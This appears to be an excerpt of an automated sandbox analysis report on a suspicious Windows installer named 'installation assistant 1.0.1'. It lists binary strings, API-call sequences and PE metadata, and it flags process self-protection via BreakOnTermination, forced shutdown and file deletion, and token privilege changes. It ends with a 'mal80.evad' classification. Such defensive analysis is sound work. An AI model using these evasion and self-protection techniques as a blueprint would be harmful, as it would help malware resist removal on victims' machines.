Source: #U5b89#U88c5#U52a9#U624b1.0.1.tmp, 00000001.00000003.2137286887.0000000003EC0000.00000004.00001000.00020000.00000000.sdmp, #U5b89#U88c5#U52a9#U624b1.0.1.tmp, 00000007.00000002.2297969558.000000006CCD8000.00000008.00000001.01000000.00000009.sdmp, hrsw.vbc.7.dr, update.vac.7.dr, 7zr.exe.7.dr, update.vac.1.dr	String found in binary or memory: http://ocsp.digicert.com0H
Source: #U5b89#U88c5#U52a9#U624b1.0.1.tmp, 00000001.00000003.2137286887.0000000003EC0000.00000004.00001000.00020000.00000000.sdmp, #U5b89#U88c5#U52a9#U624b1.0.1.tmp, 00000007.00000002.2297969558.000000006CCD8000.00000008.00000001.01000000.00000009.sdmp, hrsw.vbc.7.dr, update.vac.7.dr, 7zr.exe.7.dr, update.vac.1.dr	String found in binary or memory: http://ocsp.digicert.com0I
Source: #U5b89#U88c5#U52a9#U624b1.0.1.tmp, 00000001.00000003.2137286887.0000000003EC0000.00000004.00001000.00020000.00000000.sdmp, #U5b89#U88c5#U52a9#U624b1.0.1.tmp, 00000007.00000002.2297969558.000000006CCD8000.00000008.00000001.01000000.00000009.sdmp, hrsw.vbc.7.dr, update.vac.7.dr, 7zr.exe.7.dr, update.vac.1.dr	String found in binary or memory: http://ocsp.digicert.com0X
Source: #U5b89#U88c5#U52a9#U624b1.0.1.tmp, 00000001.00000003.2137286887.0000000003EC0000.00000004.00001000.00020000.00000000.sdmp, #U5b89#U88c5#U52a9#U624b1.0.1.tmp, 00000007.00000002.2297969558.000000006CCD8000.00000008.00000001.01000000.00000009.sdmp, hrsw.vbc.7.dr, update.vac.7.dr, 7zr.exe.7.dr, update.vac.1.dr	String found in binary or memory: http://www.digicert.com/CPS0
Source: #U5b89#U88c5#U52a9#U624b1.0.1.tmp, 00000001.00000003.2137286887.0000000003EC0000.00000004.00001000.00020000.00000000.sdmp, #U5b89#U88c5#U52a9#U624b1.0.1.tmp, 00000007.00000002.2297969558.000000006CCD8000.00000008.00000001.01000000.00000009.sdmp, hrsw.vbc.7.dr, update.vac.7.dr, 7zr.exe.7.dr, update.vac.1.dr	String found in binary or memory: http://www.digicert.com/ssl-cps-repository.htm0
Source: #U5b89#U88c5#U52a9#U624b1.0.1.exe	String found in binary or memory: https://jrsoftware.org/ishelp/index.php?topic=setupcmdlineSetupU
Source: #U5b89#U88c5#U52a9#U624b1.0.1.exe, 00000000.00000003.2046446817.000000007F99B000.00000004.00001000.00020000.00000000.sdmp, #U5b89#U88c5#U52a9#U624b1.0.1.exe, 00000000.00000003.2046093911.0000000003030000.00000004.00001000.00020000.00000000.sdmp, #U5b89#U88c5#U52a9#U624b1.0.1.tmp, 00000001.00000000.2047774569.0000000000A11000.00000020.00000001.01000000.00000004.sdmp, #U5b89#U88c5#U52a9#U624b1.0.1.tmp, 00000007.00000000.2140430410.0000000000D3D000.00000020.00000001.01000000.00000008.sdmp, #U5b89#U88c5#U52a9#U624b1.0.1.tmp.6.dr, #U5b89#U88c5#U52a9#U624b1.0.1.tmp.0.dr	String found in binary or memory: https://www.innosetup.com/
Source: #U5b89#U88c5#U52a9#U624b1.0.1.exe, 00000000.00000003.2046446817.000000007F99B000.00000004.00001000.00020000.00000000.sdmp, #U5b89#U88c5#U52a9#U624b1.0.1.exe, 00000000.00000003.2046093911.0000000003030000.00000004.00001000.00020000.00000000.sdmp, #U5b89#U88c5#U52a9#U624b1.0.1.tmp, 00000001.00000000.2047774569.0000000000A11000.00000020.00000001.01000000.00000004.sdmp, #U5b89#U88c5#U52a9#U624b1.0.1.tmp, 00000007.00000000.2140430410.0000000000D3D000.00000020.00000001.01000000.00000008.sdmp, #U5b89#U88c5#U52a9#U624b1.0.1.tmp.6.dr, #U5b89#U88c5#U52a9#U624b1.0.1.tmp.0.dr	String found in binary or memory: https://www.remobjects.com/ps

Operating System Destruction

Protects its processes via BreakOnTermination flag

Source: C:\Users\user\AppData\Local\Temp\is-05V1G.tmp\#U5b89#U88c5#U52a9#U624b1.0.1.tmp

Process information set: 01 00 00 00

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\is-05V1G.tmp\#U5b89#U88c5#U52a9#U624b1.0.1.tmp	Code function: 7_2_6CB23886 NtSetInformationThread,GetCurrentThread,NtSetInformationThread,	7_2_6CB23886
Source: C:\Users\user\AppData\Local\Temp\is-05V1G.tmp\#U5b89#U88c5#U52a9#U624b1.0.1.tmp	Code function: 7_2_6CCA5120 NtSetInformationThread,OpenSCManagerA,CloseServiceHandle,OpenServiceA,CloseServiceHandle,	7_2_6CCA5120
Source: C:\Users\user\AppData\Local\Temp\is-05V1G.tmp\#U5b89#U88c5#U52a9#U624b1.0.1.tmp	Code function: 7_2_6CB23C62 NtSetInformationThread,GetCurrentThread,NtSetInformationThread,	7_2_6CB23C62
Source: C:\Users\user\AppData\Local\Temp\is-05V1G.tmp\#U5b89#U88c5#U52a9#U624b1.0.1.tmp	Code function: 7_2_6CB23D18 NtSetInformationThread,GetCurrentThread,NtSetInformationThread,	7_2_6CB23D18
Source: C:\Users\user\AppData\Local\Temp\is-05V1G.tmp\#U5b89#U88c5#U52a9#U624b1.0.1.tmp	Code function: 7_2_6CCA5D60 OpenProcessToken,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,NtInitiatePowerAction,	7_2_6CCA5D60
Source: C:\Users\user\AppData\Local\Temp\is-05V1G.tmp\#U5b89#U88c5#U52a9#U624b1.0.1.tmp	Code function: 7_2_6CB23D62 NtSetInformationThread,GetCurrentThread,NtSetInformationThread,	7_2_6CB23D62
Source: C:\Users\user\AppData\Local\Temp\is-05V1G.tmp\#U5b89#U88c5#U52a9#U624b1.0.1.tmp	Code function: 7_2_6CB239CF NtSetInformationThread,GetCurrentThread,NtSetInformationThread,	7_2_6CB239CF
Source: C:\Users\user\AppData\Local\Temp\is-05V1G.tmp\#U5b89#U88c5#U52a9#U624b1.0.1.tmp	Code function: 7_2_6CB23A6A NtSetInformationThread,GetCurrentThread,NtSetInformationThread,	7_2_6CB23A6A

Source: C:\Users\user\AppData\Local\Temp\is-05V1G.tmp\#U5b89#U88c5#U52a9#U624b1.0.1.tmp

Code function: 7_2_6CB21950: CreateFileA,DeviceIoControl,CloseHandle,

7_2_6CB21950

Source: C:\Users\user\AppData\Local\Temp\is-05V1G.tmp\#U5b89#U88c5#U52a9#U624b1.0.1.tmp

Code function: 7_2_6CB24754 _strlen,CreateFileA,CreateFileA,CloseHandle,_strlen,std::ios_base::_Ios_base_dtor,_strlen,_strlen,_strlen,_strlen,_strlen,_strlen,_strlen,_strlen,_strlen,_strlen,_strlen,_strlen,TerminateProcess,GetCurrentProcess,TerminateProcess,_strlen,Sleep,ExitWindowsEx,Sleep,DeleteFileA,Sleep,_strlen,DeleteFileA,Sleep,_strlen,std::ios_base::_Ios_base_dtor,

7_2_6CB24754

Source: C:\Users\user\AppData\Local\Temp\is-05V1G.tmp\#U5b89#U88c5#U52a9#U624b1.0.1.tmp	Code function: 7_2_6CB24754	7_2_6CB24754
Source: C:\Users\user\AppData\Local\Temp\is-05V1G.tmp\#U5b89#U88c5#U52a9#U624b1.0.1.tmp	Code function: 7_2_6CB34A27	7_2_6CB34A27
Source: C:\Users\user\AppData\Local\Temp\is-05V1G.tmp\#U5b89#U88c5#U52a9#U624b1.0.1.tmp	Code function: 7_2_6CCA1880	7_2_6CCA1880
Source: C:\Users\user\AppData\Local\Temp\is-05V1G.tmp\#U5b89#U88c5#U52a9#U624b1.0.1.tmp	Code function: 7_2_6CCA6A43	7_2_6CCA6A43
Source: C:\Users\user\AppData\Local\Temp\is-05V1G.tmp\#U5b89#U88c5#U52a9#U624b1.0.1.tmp	Code function: 7_2_6CD06CE0	7_2_6CD06CE0
Source: C:\Users\user\AppData\Local\Temp\is-05V1G.tmp\#U5b89#U88c5#U52a9#U624b1.0.1.tmp	Code function: 7_2_6CD74DE0	7_2_6CD74DE0
Source: C:\Users\user\AppData\Local\Temp\is-05V1G.tmp\#U5b89#U88c5#U52a9#U624b1.0.1.tmp	Code function: 7_2_6CD56D10	7_2_6CD56D10
Source: C:\Users\user\AppData\Local\Temp\is-05V1G.tmp\#U5b89#U88c5#U52a9#U624b1.0.1.tmp	Code function: 7_2_6CCF2EC9	7_2_6CCF2EC9
Source: C:\Users\user\AppData\Local\Temp\is-05V1G.tmp\#U5b89#U88c5#U52a9#U624b1.0.1.tmp	Code function: 7_2_6CD5EEF0	7_2_6CD5EEF0
Source: C:\Users\user\AppData\Local\Temp\is-05V1G.tmp\#U5b89#U88c5#U52a9#U624b1.0.1.tmp	Code function: 7_2_6CD2AEEF	7_2_6CD2AEEF
Source: C:\Users\user\AppData\Local\Temp\is-05V1G.tmp\#U5b89#U88c5#U52a9#U624b1.0.1.tmp	Code function: 7_2_6CCD8EA1	7_2_6CCD8EA1
Source: C:\Users\user\AppData\Local\Temp\is-05V1G.tmp\#U5b89#U88c5#U52a9#U624b1.0.1.tmp	Code function: 7_2_6CD6C8D0	7_2_6CD6C8D0
Source: C:\Users\user\AppData\Local\Temp\is-05V1G.tmp\#U5b89#U88c5#U52a9#U624b1.0.1.tmp	Code function: 7_2_6CD24896	7_2_6CD24896
Source: C:\Users\user\AppData\Local\Temp\is-05V1G.tmp\#U5b89#U88c5#U52a9#U624b1.0.1.tmp	Code function: 7_2_6CD74870	7_2_6CD74870
Source: C:\Users\user\AppData\Local\Temp\is-05V1G.tmp\#U5b89#U88c5#U52a9#U624b1.0.1.tmp	Code function: 7_2_6CD4E810	7_2_6CD4E810
Source: C:\Users\user\AppData\Local\Temp\is-05V1G.tmp\#U5b89#U88c5#U52a9#U624b1.0.1.tmp	Code function: 7_2_6CD66820	7_2_6CD66820
Source: C:\Users\user\AppData\Local\Temp\is-05V1G.tmp\#U5b89#U88c5#U52a9#U624b1.0.1.tmp	Code function: 7_2_6CD76999	7_2_6CD76999
Source: C:\Users\user\AppData\Local\Temp\is-05V1G.tmp\#U5b89#U88c5#U52a9#U624b1.0.1.tmp	Code function: 7_2_6CD68950	7_2_6CD68950
Source: C:\Users\user\AppData\Local\Temp\is-05V1G.tmp\#U5b89#U88c5#U52a9#U624b1.0.1.tmp	Code function: 7_2_6CCD8972	7_2_6CCD8972
Source: C:\Users\user\AppData\Local\Temp\is-05V1G.tmp\#U5b89#U88c5#U52a9#U624b1.0.1.tmp	Code function: 7_2_6CD7A91A	7_2_6CD7A91A
Source: C:\Users\user\AppData\Local\Temp\is-05V1G.tmp\#U5b89#U88c5#U52a9#U624b1.0.1.tmp	Code function: 7_2_6CD56900	7_2_6CD56900
Source: C:\Users\user\AppData\Local\Temp\is-05V1G.tmp\#U5b89#U88c5#U52a9#U624b1.0.1.tmp	Code function: 7_2_6CD6A930	7_2_6CD6A930
Source: C:\Users\user\AppData\Local\Temp\is-05V1G.tmp\#U5b89#U88c5#U52a9#U624b1.0.1.tmp	Code function: 7_2_6CD64AA0	7_2_6CD64AA0
Source: C:\Users\user\AppData\Local\Temp\is-05V1G.tmp\#U5b89#U88c5#U52a9#U624b1.0.1.tmp	Code function: 7_2_6CD30A52	7_2_6CD30A52
Source: C:\Users\user\AppData\Local\Temp\is-05V1G.tmp\#U5b89#U88c5#U52a9#U624b1.0.1.tmp	Code function: 7_2_6CD7AA00	7_2_6CD7AA00
Source: C:\Users\user\AppData\Local\Temp\is-05V1G.tmp\#U5b89#U88c5#U52a9#U624b1.0.1.tmp	Code function: 7_2_6CCE0BCA	7_2_6CCE0BCA
Source: C:\Users\user\AppData\Local\Temp\is-05V1G.tmp\#U5b89#U88c5#U52a9#U624b1.0.1.tmp	Code function: 7_2_6CD6EBC0	7_2_6CD6EBC0
Source: C:\Users\user\AppData\Local\Temp\is-05V1G.tmp\#U5b89#U88c5#U52a9#U624b1.0.1.tmp	Code function: 7_2_6CD4AB90	7_2_6CD4AB90
Source: C:\Users\user\AppData\Local\Temp\is-05V1G.tmp\#U5b89#U88c5#U52a9#U624b1.0.1.tmp	Code function: 7_2_6CCF0B66	7_2_6CCF0B66
Source: C:\Users\user\AppData\Local\Temp\is-05V1G.tmp\#U5b89#U88c5#U52a9#U624b1.0.1.tmp	Code function: 7_2_6CD5E4D0	7_2_6CD5E4D0
Source: C:\Users\user\AppData\Local\Temp\is-05V1G.tmp\#U5b89#U88c5#U52a9#U624b1.0.1.tmp	Code function: 7_2_6CD64489	7_2_6CD64489
Source: C:\Users\user\AppData\Local\Temp\is-05V1G.tmp\#U5b89#U88c5#U52a9#U624b1.0.1.tmp	Code function: 7_2_6CD384AC	7_2_6CD384AC
Source: C:\Users\user\AppData\Local\Temp\is-05V1G.tmp\#U5b89#U88c5#U52a9#U624b1.0.1.tmp	Code function: 7_2_6CD545D0	7_2_6CD545D0
Source: C:\Users\user\AppData\Local\Temp\is-05V1G.tmp\#U5b89#U88c5#U52a9#U624b1.0.1.tmp	Code function: 7_2_6CD5C580	7_2_6CD5C580
Source: C:\Users\user\AppData\Local\Temp\is-05V1G.tmp\#U5b89#U88c5#U52a9#U624b1.0.1.tmp	Code function: 7_2_6CD52580	7_2_6CD52580
Source: C:\Users\user\AppData\Local\Temp\is-05V1G.tmp\#U5b89#U88c5#U52a9#U624b1.0.1.tmp	Code function: 7_2_6CD42521	7_2_6CD42521
Source: C:\Users\user\AppData\Local\Temp\is-05V1G.tmp\#U5b89#U88c5#U52a9#U624b1.0.1.tmp	Code function: 7_2_6CD68520	7_2_6CD68520
Source: C:\Users\user\AppData\Local\Temp\is-05V1G.tmp\#U5b89#U88c5#U52a9#U624b1.0.1.tmp	Code function: 7_2_6CD746C0	7_2_6CD746C0
Source: C:\Users\user\AppData\Local\Temp\is-05V1G.tmp\#U5b89#U88c5#U52a9#U624b1.0.1.tmp	Code function: 7_2_6CD6E600	7_2_6CD6E600
Source: C:\Users\user\AppData\Local\Temp\is-05V1G.tmp\#U5b89#U88c5#U52a9#U624b1.0.1.tmp	Code function: 7_2_6CCDC7CF	7_2_6CCDC7CF
Source: C:\Users\user\AppData\Local\Temp\is-05V1G.tmp\#U5b89#U88c5#U52a9#U624b1.0.1.tmp	Code function: 7_2_6CD767C0	7_2_6CD767C0
Source: C:\Users\user\AppData\Local\Temp\is-05V1G.tmp\#U5b89#U88c5#U52a9#U624b1.0.1.tmp	Code function: 7_2_6CD3C7F3	7_2_6CD3C7F3
Source: C:\Users\user\AppData\Local\Temp\is-05V1G.tmp\#U5b89#U88c5#U52a9#U624b1.0.1.tmp	Code function: 7_2_6CD667A0	7_2_6CD667A0
Source: C:\Users\user\AppData\Local\Temp\is-05V1G.tmp\#U5b89#U88c5#U52a9#U624b1.0.1.tmp	Code function: 7_2_6CD5E0E0	7_2_6CD5E0E0
Source: C:\Users\user\AppData\Local\Temp\is-05V1G.tmp\#U5b89#U88c5#U52a9#U624b1.0.1.tmp	Code function: 7_2_6CD50020	7_2_6CD50020
Source: C:\Users\user\AppData\Local\Temp\is-05V1G.tmp\#U5b89#U88c5#U52a9#U624b1.0.1.tmp	Code function: 7_2_6CD6C2A0	7_2_6CD6C2A0
Source: C:\Users\user\AppData\Local\Temp\is-05V1G.tmp\#U5b89#U88c5#U52a9#U624b1.0.1.tmp	Code function: 7_2_6CD68200	7_2_6CD68200
Source: C:\Users\user\AppData\Local\Temp\is-05V1G.tmp\#U5b89#U88c5#U52a9#U624b1.0.1.tmp	Code function: 7_2_6CD75D90	7_2_6CD75D90
Source: C:\Users\user\AppData\Local\Temp\is-05V1G.tmp\#U5b89#U88c5#U52a9#U624b1.0.1.tmp	Code function: 7_2_6CD53D50	7_2_6CD53D50
Source: C:\Users\user\AppData\Local\Temp\is-05V1G.tmp\#U5b89#U88c5#U52a9#U624b1.0.1.tmp	Code function: 7_2_6CD27D43	7_2_6CD27D43
Source: C:\Users\user\AppData\Local\Temp\is-05V1G.tmp\#U5b89#U88c5#U52a9#U624b1.0.1.tmp	Code function: 7_2_6CD59E80	7_2_6CD59E80
Source: C:\Users\user\AppData\Local\Temp\is-05V1G.tmp\#U5b89#U88c5#U52a9#U624b1.0.1.tmp	Code function: 7_2_6CD31F11	7_2_6CD31F11
Source: C:\Users\user\AppData\Local\Temp\is-05V1G.tmp\#U5b89#U88c5#U52a9#U624b1.0.1.tmp	Code function: 7_2_6CD678C8	7_2_6CD678C8
Source: C:\Users\user\AppData\Local\Temp\is-05V1G.tmp\#U5b89#U88c5#U52a9#U624b1.0.1.tmp	Code function: 7_2_6CD4589F	7_2_6CD4589F
Source: C:\Users\user\AppData\Local\Temp\is-05V1G.tmp\#U5b89#U88c5#U52a9#U624b1.0.1.tmp	Code function: 7_2_6CD599F0	7_2_6CD599F0
Source: C:\Users\user\AppData\Local\Temp\is-05V1G.tmp\#U5b89#U88c5#U52a9#U624b1.0.1.tmp	Code function: 7_2_6CD4DAD0	7_2_6CD4DAD0
Source: C:\Users\user\AppData\Local\Temp\is-05V1G.tmp\#U5b89#U88c5#U52a9#U624b1.0.1.tmp	Code function: 7_2_6CD51AA0	7_2_6CD51AA0
Source: C:\Users\user\AppData\Local\Temp\is-05V1G.tmp\#U5b89#U88c5#U52a9#U624b1.0.1.tmp	Code function: 7_2_6CD4FA50	7_2_6CD4FA50
Source: C:\Users\user\AppData\Local\Temp\is-05V1G.tmp\#U5b89#U88c5#U52a9#U624b1.0.1.tmp	Code function: 7_2_6CCF540A	7_2_6CCF540A
Source: C:\Users\user\AppData\Local\Temp\is-05V1G.tmp\#U5b89#U88c5#U52a9#U624b1.0.1.tmp	Code function: 7_2_6CD5F5C0	7_2_6CD5F5C0
Source: C:\Users\user\AppData\Local\Temp\is-05V1G.tmp\#U5b89#U88c5#U52a9#U624b1.0.1.tmp	Code function: 7_2_6CD1F5EC	7_2_6CD1F5EC
Source: C:\Users\user\AppData\Local\Temp\is-05V1G.tmp\#U5b89#U88c5#U52a9#U624b1.0.1.tmp	Code function: 7_2_6CD596E0	7_2_6CD596E0
Source: C:\Users\user\AppData\Local\Temp\is-05V1G.tmp\#U5b89#U88c5#U52a9#U624b1.0.1.tmp	Code function: 7_2_6CD4B650	7_2_6CD4B650
Source: C:\Users\user\AppData\Local\Temp\is-05V1G.tmp\#U5b89#U88c5#U52a9#U624b1.0.1.tmp	Code function: 7_2_6CD6F640	7_2_6CD6F640
Source: C:\Users\user\AppData\Local\Temp\is-05V1G.tmp\#U5b89#U88c5#U52a9#U624b1.0.1.tmp	Code function: 7_2_6CD737C0	7_2_6CD737C0
Source: C:\Users\user\AppData\Local\Temp\is-05V1G.tmp\#U5b89#U88c5#U52a9#U624b1.0.1.tmp	Code function: 7_2_6CD79700	7_2_6CD79700
Source: C:\Users\user\AppData\Local\Temp\is-05V1G.tmp\#U5b89#U88c5#U52a9#U624b1.0.1.tmp	Code function: 7_2_6CCF3092	7_2_6CCF3092
Source: C:\Users\user\AppData\Local\Temp\is-05V1G.tmp\#U5b89#U88c5#U52a9#U624b1.0.1.tmp	Code function: 7_2_6CD5F050	7_2_6CD5F050
Source: C:\Users\user\AppData\Local\Temp\is-05V1G.tmp\#U5b89#U88c5#U52a9#U624b1.0.1.tmp	Code function: 7_2_6CD571F0	7_2_6CD571F0
Source: C:\Users\user\AppData\Local\Temp\is-05V1G.tmp\#U5b89#U88c5#U52a9#U624b1.0.1.tmp	Code function: 7_2_6CD5D280	7_2_6CD5D280
Source: C:\Users\user\AppData\Local\Temp\is-05V1G.tmp\#U5b89#U88c5#U52a9#U624b1.0.1.tmp	Code function: 7_2_6CD5D380	7_2_6CD5D380
Source: C:\Users\user\AppData\Local\Temp\is-05V1G.tmp\#U5b89#U88c5#U52a9#U624b1.0.1.tmp	Code function: 7_2_6CD66AF0	7_2_6CD66AF0
Source: C:\Users\user\AppData\Local\Temp\is-05V1G.tmp\#U5b89#U88c5#U52a9#U624b1.0.1.tmp	Code function: 7_2_6CD63750	7_2_6CD63750
Source: C:\Program Files (x86)\Windows NT\7zr.exe	Code function: 11_2_001C81EC	11_2_001C81EC
Source: C:\Program Files (x86)\Windows NT\7zr.exe	Code function: 11_2_002081C0	11_2_002081C0
Source: C:\Program Files (x86)\Windows NT\7zr.exe	Code function: 11_2_001F4250	11_2_001F4250
Source: C:\Program Files (x86)\Windows NT\7zr.exe	Code function: 11_2_00218240	11_2_00218240
Source: C:\Program Files (x86)\Windows NT\7zr.exe	Code function: 11_2_0021C3C0	11_2_0021C3C0
Source: C:\Program Files (x86)\Windows NT\7zr.exe	Code function: 11_2_002104C8	11_2_002104C8
Source: C:\Program Files (x86)\Windows NT\7zr.exe	Code function: 11_2_001F8650	11_2_001F8650
Source: C:\Program Files (x86)\Windows NT\7zr.exe	Code function: 11_2_001FC950	11_2_001FC950
Source: C:\Program Files (x86)\Windows NT\7zr.exe	Code function: 11_2_001D0943	11_2_001D0943
Source: C:\Program Files (x86)\Windows NT\7zr.exe	Code function: 11_2_001F8C20	11_2_001F8C20
Source: C:\Program Files (x86)\Windows NT\7zr.exe	Code function: 11_2_00210E00	11_2_00210E00
Source: C:\Program Files (x86)\Windows NT\7zr.exe	Code function: 11_2_00214EA0	11_2_00214EA0
Source: C:\Program Files (x86)\Windows NT\7zr.exe	Code function: 11_2_0020D089	11_2_0020D089
Source: C:\Program Files (x86)\Windows NT\7zr.exe	Code function: 11_2_001E10AC	11_2_001E10AC
Source: C:\Program Files (x86)\Windows NT\7zr.exe	Code function: 11_2_00211120	11_2_00211120
Source: C:\Program Files (x86)\Windows NT\7zr.exe	Code function: 11_2_00205180	11_2_00205180
Source: C:\Program Files (x86)\Windows NT\7zr.exe	Code function: 11_2_001FD1D0	11_2_001FD1D0
Source: C:\Program Files (x86)\Windows NT\7zr.exe	Code function: 11_2_002191C0	11_2_002191C0
Source: C:\Program Files (x86)\Windows NT\7zr.exe	Code function: 11_2_0021D2C0	11_2_0021D2C0
Source: C:\Program Files (x86)\Windows NT\7zr.exe	Code function: 11_2_001853CF	11_2_001853CF
Source: C:\Program Files (x86)\Windows NT\7zr.exe	Code function: 11_2_001E53F3	11_2_001E53F3
Source: C:\Program Files (x86)\Windows NT\7zr.exe	Code function: 11_2_0021D470	11_2_0021D470
Source: C:\Program Files (x86)\Windows NT\7zr.exe	Code function: 11_2_001CD496	11_2_001CD496
Source: C:\Program Files (x86)\Windows NT\7zr.exe	Code function: 11_2_002154D0	11_2_002154D0
Source: C:\Program Files (x86)\Windows NT\7zr.exe	Code function: 11_2_00181572	11_2_00181572
Source: C:\Program Files (x86)\Windows NT\7zr.exe	Code function: 11_2_00211550	11_2_00211550
Source: C:\Program Files (x86)\Windows NT\7zr.exe	Code function: 11_2_001D9652	11_2_001D9652
Source: C:\Program Files (x86)\Windows NT\7zr.exe	Code function: 11_2_0020D6A0	11_2_0020D6A0
Source: C:\Program Files (x86)\Windows NT\7zr.exe	Code function: 11_2_00199766	11_2_00199766
Source: C:\Program Files (x86)\Windows NT\7zr.exe	Code function: 11_2_001897CA	11_2_001897CA
Source: C:\Program Files (x86)\Windows NT\7zr.exe	Code function: 11_2_0021D9E0	11_2_0021D9E0
Source: C:\Program Files (x86)\Windows NT\7zr.exe	Code function: 11_2_00181AA1	11_2_00181AA1
Source: C:\Program Files (x86)\Windows NT\7zr.exe	Code function: 11_2_00205E80	11_2_00205E80
Source: C:\Program Files (x86)\Windows NT\7zr.exe	Code function: 11_2_00205F80	11_2_00205F80
Source: C:\Program Files (x86)\Windows NT\7zr.exe	Code function: 11_2_0019E00A	11_2_0019E00A
Source: C:\Program Files (x86)\Windows NT\7zr.exe	Code function: 11_2_002022E0	11_2_002022E0
Source: C:\Program Files (x86)\Windows NT\7zr.exe	Code function: 11_2_00222300	11_2_00222300
Source: C:\Program Files (x86)\Windows NT\7zr.exe	Code function: 11_2_001EE49F	11_2_001EE49F
Source: C:\Program Files (x86)\Windows NT\7zr.exe	Code function: 11_2_002025F0	11_2_002025F0
Source: C:\Program Files (x86)\Windows NT\7zr.exe	Code function: 11_2_001FA6A0	11_2_001FA6A0
Source: C:\Program Files (x86)\Windows NT\7zr.exe	Code function: 11_2_001F66D0	11_2_001F66D0
Source: C:\Program Files (x86)\Windows NT\7zr.exe	Code function: 11_2_0021E990	11_2_0021E990
Source: C:\Program Files (x86)\Windows NT\7zr.exe	Code function: 11_2_00202A80	11_2_00202A80
Source: C:\Program Files (x86)\Windows NT\7zr.exe	Code function: 11_2_001DAB11	11_2_001DAB11
Source: C:\Program Files (x86)\Windows NT\7zr.exe	Code function: 11_2_00206CE0	11_2_00206CE0
Source: C:\Program Files (x86)\Windows NT\7zr.exe	Code function: 11_2_002070D0	11_2_002070D0
Source: C:\Program Files (x86)\Windows NT\7zr.exe	Code function: 11_2_001EB121	11_2_001EB121
Source: C:\Program Files (x86)\Windows NT\7zr.exe	Code function: 11_2_001FB180	11_2_001FB180
Source: C:\Program Files (x86)\Windows NT\7zr.exe	Code function: 11_2_00217200	11_2_00217200
Source: C:\Program Files (x86)\Windows NT\7zr.exe	Code function: 11_2_0020F3A0	11_2_0020F3A0
Source: C:\Program Files (x86)\Windows NT\7zr.exe	Code function: 11_2_0021F3C0	11_2_0021F3C0
Source: C:\Program Files (x86)\Windows NT\7zr.exe	Code function: 11_2_001AB3E4	11_2_001AB3E4
Source: C:\Program Files (x86)\Windows NT\7zr.exe	Code function: 11_2_0020F420	11_2_0020F420
Source: C:\Program Files (x86)\Windows NT\7zr.exe	Code function: 11_2_001F7410	11_2_001F7410
Source: C:\Program Files (x86)\Windows NT\7zr.exe	Code function: 11_2_00213530	11_2_00213530
Source: C:\Program Files (x86)\Windows NT\7zr.exe	Code function: 11_2_001FF500	11_2_001FF500
Source: C:\Program Files (x86)\Windows NT\7zr.exe	Code function: 11_2_0022351A	11_2_0022351A
Source: C:\Program Files (x86)\Windows NT\7zr.exe	Code function: 11_2_0021F599	11_2_0021F599
Source: C:\Program Files (x86)\Windows NT\7zr.exe	Code function: 11_2_00223601	11_2_00223601
Source: C:\Program Files (x86)\Windows NT\7zr.exe	Code function: 11_2_001F3790	11_2_001F3790
Source: C:\Program Files (x86)\Windows NT\7zr.exe	Code function: 11_2_002177C0	11_2_002177C0
Source: C:\Program Files (x86)\Windows NT\7zr.exe	Code function: 11_2_001AF8E0	11_2_001AF8E0
Source: C:\Program Files (x86)\Windows NT\7zr.exe	Code function: 11_2_001FF910	11_2_001FF910
Source: C:\Program Files (x86)\Windows NT\7zr.exe	Code function: 11_2_0019BAC9	11_2_0019BAC9
Source: C:\Program Files (x86)\Windows NT\7zr.exe	Code function: 11_2_00207AF0	11_2_00207AF0
Source: C:\Program Files (x86)\Windows NT\7zr.exe	Code function: 11_2_001D3AEF	11_2_001D3AEF
Source: C:\Program Files (x86)\Windows NT\7zr.exe	Code function: 11_2_00207C50	11_2_00207C50
Source: C:\Program Files (x86)\Windows NT\7zr.exe	Code function: 11_2_0019BC92	11_2_0019BC92
Source: C:\Program Files (x86)\Windows NT\7zr.exe	Code function: 11_2_001FFDF0	11_2_001FFDF0

Source: C:\Program Files (x86)\Windows NT\7zr.exe

Process token adjusted: Security

Jump to behavior

Source: C:\Program Files (x86)\Windows NT\7zr.exe	Code function: String function: 00181E40 appears 172 times
Source: C:\Program Files (x86)\Windows NT\7zr.exe	Code function: String function: 0021FB10 appears 723 times
Source: C:\Program Files (x86)\Windows NT\7zr.exe	Code function: String function: 001828E3 appears 34 times
Source: C:\Users\user\AppData\Local\Temp\is-05V1G.tmp\#U5b89#U88c5#U52a9#U624b1.0.1.tmp	Code function: String function: 6CD76F10 appears 728 times
Source: C:\Users\user\AppData\Local\Temp\is-05V1G.tmp\#U5b89#U88c5#U52a9#U624b1.0.1.tmp	Code function: String function: 6CCD9240 appears 53 times

Source: #U5b89#U88c5#U52a9#U624b1.0.1.tmp.0.dr	Static PE information: Resource name: RT_RCDATA type: PE32+ executable (console) x86-64, for MS Windows
Source: #U5b89#U88c5#U52a9#U624b1.0.1.tmp.6.dr	Static PE information: Resource name: RT_RCDATA type: PE32+ executable (console) x86-64, for MS Windows

Source: #U5b89#U88c5#U52a9#U624b1.0.1.tmp.0.dr	Static PE information: Number of sections : 11 > 10
Source: #U5b89#U88c5#U52a9#U624b1.0.1.exe	Static PE information: Number of sections : 11 > 10
Source: #U5b89#U88c5#U52a9#U624b1.0.1.tmp.6.dr	Static PE information: Number of sections : 11 > 10

Source: #U5b89#U88c5#U52a9#U624b1.0.1.exe, 00000000.00000000.2044306284.0000000000A99000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: OriginalFileName7RMHWwyl1NfL.exe vs #U5b89#U88c5#U52a9#U624b1.0.1.exe
Source: #U5b89#U88c5#U52a9#U624b1.0.1.exe, 00000000.00000003.2046446817.000000007FC9A000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFileName7RMHWwyl1NfL.exe vs #U5b89#U88c5#U52a9#U624b1.0.1.exe
Source: #U5b89#U88c5#U52a9#U624b1.0.1.exe, 00000000.00000003.2046093911.000000000314E000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFileName7RMHWwyl1NfL.exe vs #U5b89#U88c5#U52a9#U624b1.0.1.exe
Source: #U5b89#U88c5#U52a9#U624b1.0.1.exe	Binary or memory string: OriginalFileName7RMHWwyl1NfL.exe vs #U5b89#U88c5#U52a9#U624b1.0.1.exe

Source: #U5b89#U88c5#U52a9#U624b1.0.1.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: tProtect.dll.13.dr	Binary string: \Device\TfSysMon
Source: tProtect.dll.13.dr	Binary string: \Device\TfKbMonPWLCache

Source: classification engine

Classification label: mal80.evad.winEXE@133/33@0/0

